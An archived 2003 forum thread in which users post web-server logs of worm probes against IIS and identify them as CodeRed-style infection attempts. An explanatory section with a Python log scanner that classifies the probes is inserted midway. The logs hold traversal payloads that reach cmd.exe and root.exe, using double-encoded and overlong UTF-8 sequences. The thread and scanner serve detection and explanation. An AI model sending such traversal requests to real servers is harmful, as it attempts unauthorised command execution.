Valhalla Legends Forums Archive | General Discussion | uber-l33t h4x0r

UserLoser
Found this in my log from my webserver running on my computer, I found it funny ;D

12.211.62.105 - - [08/Sep/2003:02:01:56 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:57 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:58 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:58 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:58 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:59 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:59 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:59 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:02 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:02:03 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
September 9, 2003, 12:35 AM
Yoni
Looks like a script kiddie scanning for well known IIS holes. I wonder what all those holes are.
September 9, 2003, 12:46 AM
Grok
vL.com gets those daily, and many more.

I've seen most of those for 3+ years.

The ..%255c../ looks like it is trying to exploit both parent paths and unicode bypass exploit at the same time.

The MSADC is an exploitable sample site that is installed with IIS 4 and IIS 5, which allows increased permissions to the attacker.

The rest of it is a lot of pecking around for figuring out your architecture.
September 9, 2003, 1:07 AM
UserLoser
Hmm, I'm only on Windows XP Home Edition, and that's an Abyss Web Server. I don't think by doing that they can confuse the server or get past it or whatever - but I don't know anything about website/server cracking.
September 9, 2003, 1:43 AM
iago
I scanned his IP with Thing's scanner, found nothing sadly :(
September 9, 2003, 1:50 AM
UserLoser
My IP or his? ;)
September 9, 2003, 1:55 AM
iago
I only see one IP.. assumed it was his :P
September 9, 2003, 1:59 AM
UserLoser
Oh it is his, but I thought since you're a moderator, you could have gotten my IP :P
September 9, 2003, 1:59 AM
Thing
Those 14 entries are the signature of a machine infected with CodeRed. It is trying to infect yours.

$torm made a fine script on one of my boxes which searches the Apache access log and copies CodeRed entries to a text file. Here is a small portion of that file:
[code]63.225.238.53 - - [08/Sep/2002:00:47:11 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 712
63.225.238.53 - - [08/Sep/2002:00:47:14 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 712
63.225.238.53 - - [08/Sep/2002:00:47:14 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:14 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
[/code]
September 9, 2003, 12:48 PM
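As an added example (not $torm's script, and not code posted anywhere in this thread): a Python version of the log search Thing describes, which also applies the decoding tricks Grok mentions, double percent-decoding and lenient UTF-8 handling, so it can name which trick each request used. The sample log lines are constructed for this example and use RFC 5737 documentation addresses; the lenient two-byte decoder is a model of the behaviour that made those probes work against unpatched IIS, written from the sequences quoted in the thread, not IIS code.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample access-log lines (not from the thread); the source
# addresses are RFC 5737 documentation IPs. The request paths mirror the
# worm probes quoted above, plus two ordinary requests that must not match.
SAMPLE_LOG = """\
192.0.2.10 - - [08/Sep/2003:02:01:56 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266
192.0.2.10 - - [08/Sep/2003:02:01:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
192.0.2.10 - - [08/Sep/2003:02:01:58 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
192.0.2.10 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
192.0.2.10 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
192.0.2.10 - - [08/Sep/2003:02:02:02 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
192.0.2.20 - - [10/Sep/2003:21:23:44 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
192.0.2.30 - - [08/Sep/2003:02:05:00 -0500] "GET /index.html HTTP/1.0" 200 1043
192.0.2.30 - - [08/Sep/2003:02:06:00 -0500] "GET /docs/scripts/readme.txt HTTP/1.1" 200 512
"""

# Apache common log format; the protocol token is optional because some
# probes send an HTTP/0.9-style request line with no version at all.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>[^"\s]+)(?: (?P<proto>[^"]*))?" (?P<status>\d{3}) (?P<size>\S+)$'
)

# What every probe is ultimately after: a command shell reachable via the web root.
TARGET_RE = re.compile(r"/(?:winnt/system32/cmd|root)\.exe$", re.IGNORECASE)


def lenient_overlong_decode(data: bytes) -> str:
    """Model (assumption, not IIS source) of a lenient UTF-8 decoder: a 0xC0/0xC1
    lead byte plus the next byte is folded into one character from their low bits,
    so %c0%af -> '/', %c1%9c -> '\\', and even %c1%1c -> '\\' although 0x1c is not
    a valid continuation byte. Everything else passes through as Latin-1."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def canonicalize(uri: str, passes: int) -> str:
    """Percent-decode `passes` times (folding overlong sequences each time) and map
    backslash to slash. passes=1 is what a correct server sees; passes=2 models the
    double-decode flaw, where %255c survives the first decode as %5c and becomes a
    backslash only after the path check has already run."""
    path = uri.split("?", 1)[0]          # drop the query string (/c+dir)
    for _ in range(passes):
        path = lenient_overlong_decode(unquote_to_bytes(path.encode("latin-1")))
    return path.replace("\\", "/")


def classify(uri: str):
    """Return a label naming the trick a probe relies on, or None for a benign request."""
    once = canonicalize(uri, 1)
    twice = canonicalize(uri, 2)
    if not TARGET_RE.search(twice):
        return None
    if twice.lower().endswith("/root.exe"):
        return "root.exe backdoor probe"
    if "/../" in once:                   # traversal visible after a single decode
        if re.search(r"%c[01]%", uri, re.IGNORECASE):
            return "overlong-utf8 traversal"
        return "plain traversal"
    if "/../" in twice:                  # only appears after the second decode
        return "double-decode traversal"
    return "direct path probe"           # e.g. /c/ and /d/ mapped to drive roots


def scan(log_text: str):
    """Parse each log line and keep the ones that look like a cmd.exe/root.exe probe."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify(m["uri"])
        if label:
            hits.append({"ip": m["ip"], "status": int(m["status"]),
                         "uri": m["uri"], "technique": label})
    return hits


def per_source(hits):
    """Count probes per source address; a burst from one IP is the worm signature."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(f'{h["ip"]} {h["status"]} {h["technique"]:24} {h["uri"]}')
    print(per_source(found))
```

Pointing `scan()` at a real access log (read the file and pass its contents) is enough to reproduce the text file Thing mentions; the per-source counts are the useful part, since a lone 404 for cmd.exe is noise but a dozen in three seconds from one address is an infected host sweeping the subnet.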
UserLoser
Nobody infects my computer!
September 9, 2003, 8:30 PM
Fr0z3N
[code]134.202.1.149 - - [10/Sep/2003:21:23:44 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -[/code]

Only one I saw. But I'm too lazy to look through them all.

On Apache, Thing wanna send me that file by $torm? :D
September 11, 2003, 1:38 AM
Thing
[quote]On Apache, Thing wanna send me that file by $torm?[/quote]You should ask him. He wrote it.
September 11, 2003, 2:19 AM
Fr0z3N
Where would I see him to ask?
September 11, 2003, 11:43 AM
Thing
PM this guy.
September 11, 2003, 12:51 PM